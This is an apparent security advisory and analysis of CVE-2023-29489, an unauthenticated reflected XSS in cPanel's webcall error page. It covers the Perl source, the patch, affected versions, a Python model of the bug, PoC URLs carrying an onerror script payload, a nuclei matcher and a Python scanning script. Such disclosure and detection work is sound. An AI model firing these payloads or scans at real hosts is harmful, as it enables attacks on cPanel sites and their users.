Foreword
Any direct or indirect consequences and losses arising from the dissemination or use of the information in this article are borne by the user; the author accepts no responsibility for them.
If the vulnerability details in this article affect any party, please contact the author promptly; your understanding is appreciated.
1. Vulnerability principle
Vulnerability brief
cPanel is one of the most widely used commercial control panels in the web hosting industry. It runs on Linux and BSD systems, is written mainly in Perl (the components analysed below are Perl modules) and is closed source. It provides a complete set of hosting management functions: webmail and the usual mail protocols, web-based FTP management, SSH access, database administration, DNS management and other remote, web-based host management features.
This vulnerability can be exploited without authentication, and it does not matter whether the cPanel management ports 2080, 2082, 2083 and 2086 are exposed: the same /cpanelwebcall/ path is also reachable through the site's ordinary web server port, as the PoC below shows.
Vulnerability scope
Provider : cPanel
Product : cPanel
Affected versions: builds prior to the fixed releases, i.e. 11.109 before 11.109.9999.116, 11.108 before 11.108.0.13, 11.106 before 11.106.0.18 and 11.102 before 11.102.0.31
Fixed versions: 11.109.9999.116, 11.108.0.13, 11.106.0.18 and 11.102.0.31
Vulnerability analysis
The root cause is that a user-controlled value that ends up in an HTTP response is neither escaped nor filtered, so an attacker can place HTML and script in it and have it reflected back to a victim's browser.
Httpd.pm:
elsif ( 0 == rindex( $doc_path, '/cpanelwebcall/', 0 ) ) {
    # rindex(..., 0) == 0 is a prefix test: the request path starts with "/cpanelwebcall/"
    # First 15 chars are "/cpanelwebcall/"
    _serve_cpanelwebcall(
        $self->get_server_obj(),
        substr( $doc_path, 15 ),    # everything after the prefix, passed through untouched
    );
}
The above code routes every request whose path begins with /cpanelwebcall/ to _serve_cpanelwebcall, and whatever follows the prefix is handed over verbatim, without any validation at this layer.
Which involves the function _serve_cpanelwebcall:
sub _serve_cpanelwebcall ( $server_obj, $webcall_uri_piece ) {
    require Cpanel::Server::WebCalls;
    # handle() dies on an invalid ID; the exception is caught further up and
    # turned into cpsrvd's error page
    my $out = Cpanel::Server::WebCalls::handle($webcall_uri_piece);
    $server_obj->respond_200_ok_text($out);
    return;
}
The local variable $out holds the return value of handle(), i.e. the result of processing $webcall_uri_piece; on success it is sent back to the client as a 200 text response.
sub handle ($request) {
    my $id = extract_id_from_request($request);
    substr( $request, 0, length $id ) = q<>;    # strip the ID from the front of the request
    Cpanel::WebCalls::ID::is_valid($id) or do {
        # $id is the attacker-controlled leading part of the path, embedded verbatim
        die _http_invalid_params_err("Invalid webcall ID: $id");
    };
    # ... remainder of handle() not shown ...
}
handle() first extracts the webcall ID from the front of the request and strips it off. If the ID does not pass Cpanel::WebCalls::ID::is_valid, it dies with an exception whose message contains the rejected ID verbatim; since the ID is simply the leading part of the attacker-supplied path, the attacker controls the message text.
sub _http_invalid_params_err ($why) {
    return Cpanel::Exception::create_raw( 'cpsrvd::BadRequest', $why );
}
_http_invalid_params_err() wraps the message in a cpsrvd::BadRequest exception, which cpsrvd renders as an HTTP 400 error page.
Further analysis shows that the error page is built by Cpanel::Server::Handlers::Httpd::ErrorPage, which places the exception message into the template variable message_html without HTML-encoding it. The attacker-supplied ID is therefore reflected into an HTML response unescaped: a reflected XSS reachable without authentication.
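To make the reflection path concrete, here is an added Python model of the flow described above. It is not cPanel's code: it reimplements the shape of the Httpd.pm dispatch, Cpanel::Server::WebCalls::handle and the ErrorPage sink so the pre-fix and post-fix behaviour can be compared side by side. The ID syntax (assumed: 32 alphanumerics), the "ID is the leading path segment" rule, the HTML skeleton of the error page, and the URL-decoding of the path are all assumptions made for illustration; the real validator and template are not shown on the page.

```python
import html
import re
from typing import Tuple
from urllib.parse import unquote

WEBCALL_PREFIX = "/cpanelwebcall/"

# Assumption for this model: a webcall ID is 32 characters of [A-Za-z0-9].
# The real rule lives in Cpanel::WebCalls::ID::is_valid and is not shown on
# the page; only the fact that an invalid ID is echoed back matters here.
ID_RE = re.compile(r"[A-Za-z0-9]{32}")


class BadRequest(Exception):
    """Stands in for the cpsrvd::BadRequest exception created by
    _http_invalid_params_err; its text becomes the error page message."""


def extract_id_from_request(request: str) -> str:
    """Model of extract_id_from_request (assumed behaviour): the ID is the
    leading path segment, taken as-is. Nothing is validated at this point."""
    return request.split("/", 1)[0]


def is_valid_id(candidate: str) -> bool:
    """Model of Cpanel::WebCalls::ID::is_valid (see the ID_RE assumption)."""
    return ID_RE.fullmatch(candidate) is not None


def handle(request: str) -> str:
    """Model of Cpanel::Server::WebCalls::handle, error path only.
    Mirrors the page's snippet: extract the ID (the Perl then strips it from
    $request) and die with a message that embeds the rejected ID verbatim."""
    wc_id = extract_id_from_request(request)
    if not is_valid_id(wc_id):
        raise BadRequest(f"Invalid webcall ID: {wc_id}")
    return "OK"  # success path is not modelled


def render_error_page(message: str, *, encode: bool) -> str:
    """Model of Cpanel::Server::Handlers::Httpd::ErrorPage.
    encode=False is the pre-fix behaviour (message_html interpolated raw);
    encode=True applies the equivalent of safe_html_encode_str, for which
    html.escape with quote=True stands in here."""
    message_html = html.escape(message, quote=True) if encode else message
    return (
        "<html><body><h1>400 Bad Request</h1>"
        f"<p>{message_html}</p></body></html>"
    )


def serve(path: str, *, patched: bool) -> Tuple[int, str]:
    """Model of the Httpd.pm dispatch: a path starting with /cpanelwebcall/ is
    handed to the webcall handler with the prefix removed, and a BadRequest
    from the handler becomes an HTML error page. The path is URL-decoded
    first (assumed: the PoC's %20 shows up as a space in the response)."""
    if not path.startswith(WEBCALL_PREFIX):
        return 404, render_error_page("Not Found", encode=patched)
    piece = unquote(path[len(WEBCALL_PREFIX):])
    try:
        return 200, handle(piece)
    except BadRequest as exc:
        return 400, render_error_page(str(exc), encode=patched)


if __name__ == "__main__":
    poc = '/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa'
    for patched in (False, True):
        status, body = serve(poc, patched=patched)
        print(f"patched={patched} status={status}\n{body}\n")
```

Running it with the PoC path shows the unpatched model returning a 400 page whose body contains the raw `<img ...>` tag, while the patched model returns the same page with the tag encoded as `&lt;img ... &gt;`; the status code is identical in both cases, so only the body tells the two apart.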
patch part
The fix in the patched cPanel builds encodes the message at the sink:
Cpanel/Server/Handlers/Httpd/ErrorPage.pm:
++ use Cpanel::Encoder::Tiny ();
... omitted for brevity ...
++ $var{message_html} = Cpanel::Encoder::Tiny::safe_html_encode_str( $var{message_html} );
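Review bot: the visible hunk applies safe_html_encode_str to message_html alone, and the omitted middle of the patch leaves open whether the other entries of %var that reach the error template get the same treatment; encoding at the sink is the right place, but it only closes this path if every variable interpolated into the page goes through it. The "_html" suffix on the name also suggests some producers may pass pre-built markup; any such caller will now be double-encoded or rendered as literal text, so the producers of message_html should be reviewed alongside this change.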
2. Vulnerability reproduction
Reproduction
Take a cPanel host as the target.
Then reproduce the issue with the PoC below.
POC:
http://example.com/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
http://example.com:2082/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
http://example.com:2086/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
Note: the same path is served on the other cPanel ports listed above, so test every exposed port (including the HTTPS variants).
The same check as a nuclei template request block:
requests:
  - method: GET
    path:
      - '{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa'
    matchers:
      - type: word
        part: body
        words:
          - '<img src=x onerror="prompt(1)">'
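The matcher above only looks for the raw tag in the body. As an added example (not part of the original post and not a nuclei template), the stand-alone checker below builds the same probe URL as the PoC and separates the verdict logic from the network call so it can be exercised offline. It also applies two checks a practitioner wants that the word matcher skips: it distinguishes a verbatim reflection in a text/html response from one in a non-HTML response (which a browser will not execute), and it recognises the encoded form a patched build returns. The sample response bodies are constructed for the example, not captured from a real host, and the function names are this example's own.

```python
import urllib.error
import urllib.request
from typing import Optional

# The same marker the page's PoC uses. The trailing a's are kept so the
# probe is byte-for-byte the PoC; the <img ...> part is what we look for.
PAYLOAD = '<img src=x onerror="prompt(1)">aaaaaaaaaaaa'
ENCODED_PAYLOAD = PAYLOAD.replace(" ", "%20")
# What a patched build (safe_html_encode_str at the sink) reflects instead.
ENCODED_FORM = "&lt;img src=x onerror=&quot;prompt(1)&quot;&gt;"

# Constructed sample responses for offline use; not captured from a real host.
SAMPLE_VULNERABLE_BODY = (
    "<html><body><h1>400 Bad Request</h1><p>Invalid webcall ID: "
    + PAYLOAD + "</p></body></html>"
)
SAMPLE_PATCHED_BODY = SAMPLE_VULNERABLE_BODY.replace(
    PAYLOAD, ENCODED_FORM + "aaaaaaaaaaaa"
)


def probe_url(base_url: str) -> str:
    """Build the PoC URL for a target base URL (scheme, host, optional port)."""
    return f"{base_url.rstrip('/')}/cpanelwebcall/{ENCODED_PAYLOAD}"


def classify(content_type: Optional[str], body: str) -> str:
    """Turn a response into a verdict:
      vulnerable          - payload reflected verbatim into an HTML body
      reflected_non_html  - reflected verbatim, but the response is not
                            text/html, so a browser will not execute it
      patched             - reflected only in HTML-encoded form
      no_reflect          - nothing reflected (path not handled by cpsrvd,
                            or a different error page)"""
    is_html = "text/html" in (content_type or "").lower()
    if PAYLOAD in body:
        return "vulnerable" if is_html else "reflected_non_html"
    if ENCODED_FORM in body:
        return "patched"
    return "no_reflect"


def check(base_url: str, timeout: float = 10.0) -> str:
    """Live check against one target (not exercised by the offline test).
    cpsrvd answers the invalid ID with HTTP 400, which urllib raises as
    HTTPError, so the error branch reads the body instead of giving up."""
    req = urllib.request.Request(
        probe_url(base_url), headers={"User-Agent": "cpanelwebcall-xss-check"}
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(resp.headers.get("Content-Type"),
                            resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        return classify(err.headers.get("Content-Type"),
                        err.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    import sys
    for target in sys.argv[1:]:
        print(target, check(target))
```

Usage: `python3 check.py http://example.com http://example.com:2082 https://example.com:2083` prints one verdict per target. Only run it against hosts you are authorised to test.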
Execute PoC
Fix
Update to 11.109.9999.116, 11.108.0.13, 11.106.0.18 or 11.102.0.31, whichever matches the installed branch.
Enable cPanel's automatic update feature so that future security builds are applied.
Conclusion
This article has walked through the root cause and reproduction of CVE-2023-29489, a reflected XSS in cPanel. The vulnerability comes down to a user-controlled value (the rejected webcall ID) being written into an HTML error page without escaping or filtering, which lets an attacker exploit it without authentication.